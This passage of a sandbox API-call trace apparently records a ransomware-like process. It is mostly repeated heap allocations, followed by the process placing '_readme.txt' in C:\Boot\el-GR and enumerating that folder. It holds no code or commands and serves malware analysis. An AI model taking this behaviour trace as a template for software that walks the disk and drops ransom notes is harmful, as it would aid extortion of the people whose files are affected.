lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.479] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.479] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.479] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.479] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.479] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.479] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.479] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.479] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.479] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.479] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.479] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.479] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.479] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.479] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.479] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.479] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.479] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.479] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.479] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.479] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.479] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.479] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.479] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.479] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.479] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.479] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.479] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.479] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.479] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.479] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.479] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.479] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.479] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.479] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.479] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.479] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.479] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.480] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.480] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.480] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.480] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.480] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.480] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.480] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.480] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.480] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.480] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.480] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.480] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.480] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.480] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.480] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.480] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.480] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.480] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.480] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.480] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.480] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.480] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.480] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.480] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.480] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.480] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.480] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.481] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.481] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.481] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.481] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.481] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.481] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.481] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.481] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.481] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.481] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.481] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.481] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.481] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.481] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.481] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.481] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.481] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.481] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.481] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.481] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.481] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.481] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.481] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.481] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.481] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.481] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.481] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.481] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.481] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.481] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.481] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.481] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.481] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.481] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.481] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.481] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.481] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.481] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.482] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.482] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.482] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.482] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.482] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.482] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.482] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.482] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.482] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.482] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.482] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.482] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.482] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.482] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.482] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.482] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.482] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.482] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.482] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.482] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.482] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.482] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.482] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.482] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.482] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.482] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.482] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.482] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.482] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.482] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.482] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.482] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.482] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.482] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.482] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.482] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.482] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.482] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.482] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.483] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.483] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.483] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.483] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.483] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.483] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.483] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.483] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.483] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.483] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.483] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.483] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.483] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.483] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.483] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.483] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.483] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.483] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.483] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.483] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.483] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.483] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.483] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.483] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.483] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.483] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.483] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.483] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.483] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.483] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.483] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.483] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.483] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.483] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.483] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.483] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.483] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.483] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.484] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.484] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.484] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.484] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.484] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.484] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.484] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.484] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.484] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.484] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.484] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.484] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.484] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.484] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.484] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.484] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.484] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.484] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.484] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.484] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.484] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.484] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.484] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.484] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.484] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0146.484] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.484] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.484] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.484] PathFindFileNameW (pszPath="") returned="" [0146.484] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.485] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.485] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.485] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.485] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.485] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.485] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.485] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0146.485] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.485] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.485] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0146.488] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.488] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.488] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaad5d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaad5d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.489] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.489] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaad5d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaad5d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.489] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.489] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaad5d0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaad5d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaad5d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.489] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, 